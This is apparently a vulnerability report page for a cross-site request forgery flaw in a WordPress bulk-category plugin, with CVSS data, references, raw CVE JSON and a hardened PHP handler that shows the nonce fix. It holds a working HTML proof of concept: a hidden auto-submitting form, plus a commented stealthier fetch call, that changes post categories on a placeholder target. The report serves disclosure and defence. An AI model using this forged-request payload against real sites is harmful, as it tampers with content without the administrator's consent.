Security Vulnerability Report
CVE-2026-1081 CVSS 4.3 MEDIUM


Published: 2026-01-24 08:16:08
Last Modified: 2026-04-15 00:35:42

Description

The Set Bulk Post Categories plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the bulk category update functionality. This makes it possible for unauthenticated attackers to modify post categories in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Set Bulk Post Categories plugin <= 1.1 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for CVE-2026-1081 -->
<!-- This PoC demonstrates how an attacker can trick a WordPress admin into changing post categories -->
<!DOCTYPE html>
<html>
<head>
  <title>Category Update PoC</title>
</head>
<body>
  <h1>Interesting Article</h1>
  <p>Click here to read more: <a href="http://malicious-site.com/page">Read More</a></p>

  <!-- Hidden CSRF form that auto-submits -->
  <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST">
    <input type="hidden" name="action" value="set_bulk_categories">
    <input type="hidden" name="post_ids" value="1,2,3">
    <input type="hidden" name="categories" value="malicious-category">
    <input type="hidden" name="remove_cats" value="1">
  </form>

  <script>
    // Auto-submit the form when page loads
    document.getElementById('csrfForm').submit();

    // Alternative: Use fetch API for more stealthy attack
    /*
    fetch('http://target-site.com/wp-admin/admin-post.php', {
      method: 'POST',
      mode: 'no-cors',
      credentials: 'include',
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
      body: 'action=set_bulk_categories&post_ids=1,2,3&categories=malicious-category&remove_cats=1'
    });
    */
  </script>

  <p>If you see this message, the attack has been executed.</p>
</body>
</html>
```
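The root cause named in the description is a state-changing admin-post handler with no nonce check, so a form hosted on any origin is accepted as long as the admin's cookies ride along. The following is an added example of the hardened shape such a handler should have; it is not the plugin's own code (the real handler is at the Trac link in the references), and the action name and the post_ids / categories / remove_cats field names are assumed from the PoC above.

```php
<?php
// Added example (not the plugin's code): a hardened admin-post handler for a
// bulk category update. The action name and POST field names (post_ids,
// categories, remove_cats) are assumed from the PoC above.

// Render the form with a nonce tied to this specific action.
function sbpc_example_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="set_bulk_categories">';
    wp_nonce_field( 'set_bulk_categories' );            // emits _wpnonce + _wp_http_referer
    echo '<input type="text" name="post_ids" placeholder="1,2,3">';
    echo '<input type="text" name="categories" placeholder="News">';
    echo '<label><input type="checkbox" name="remove_cats" value="1"> replace existing</label>';
    echo '<button type="submit">Update</button></form>';
}

// Handle the submission. The two checks at the top are what the vulnerable
// version lacks: a cross-site form cannot supply a valid nonce, so
// check_admin_referer() stops the request with a 403 before anything changes.
function sbpc_example_handle_bulk_update() {
    check_admin_referer( 'set_bulk_categories' );       // CSRF: verify nonce (+ referer)
    if ( ! current_user_can( 'edit_posts' ) ) {         // authz: a session alone is not enough
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }

    $post_ids = array_filter( array_map( 'absint', explode( ',', (string) ( $_POST['post_ids'] ?? '' ) ) ) );
    $names    = array_map( 'trim', explode( ',', sanitize_text_field( wp_unslash( $_POST['categories'] ?? '' ) ) ) );
    $cat_ids  = array_filter( array_map( 'get_cat_ID', $names ) );  // get_cat_ID() returns 0 for unknown names; dropped
    $append   = empty( $_POST['remove_cats'] );           // remove_cats=1 replaces instead of appending

    foreach ( $post_ids as $post_id ) {
        if ( current_user_can( 'edit_post', $post_id ) ) {   // per-post capability check
            wp_set_post_categories( $post_id, $cat_ids, $append );
        }
    }
    wp_safe_redirect( wp_get_referer() ?: admin_url() );
    exit;
}
add_action( 'admin_post_set_bulk_categories', 'sbpc_example_handle_bulk_update' );
```

With the nonce in place, the auto-submitting form from the PoC fails at check_admin_referer() and the categories are left untouched; the capability checks additionally limit a valid request to posts the current user may edit.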

References

- https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/tags/1.1/set-bulk-categories.php#L36
- https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/trunk/set-bulk-categories.php#L36
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9503f908-ead2-4c34-89b9-1e2348b90f3c?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-1081",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-24T08:16:08.313",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "The Set Bulk Post Categories plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the bulk category update functionality. This makes it possible for unauthenticated attackers to modify post categories in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."},
      {"lang": "es", "value": "El plugin Set Bulk Post Categories para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.1, inclusive. Esto se debe a la falta de validación de nonce en la funcionalidad de actualización masiva de categorías. Esto hace posible que atacantes no autenticados modifiquen categorías de entradas de forma masiva a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/tags/1.1/set-bulk-categories.php#L36", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/trunk/set-bulk-categories.php#L36", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9503f908-ead2-4c34-89b9-1e2348b90f3c?source=cve", "source": "[email protected]"}
    ]
  }
}
```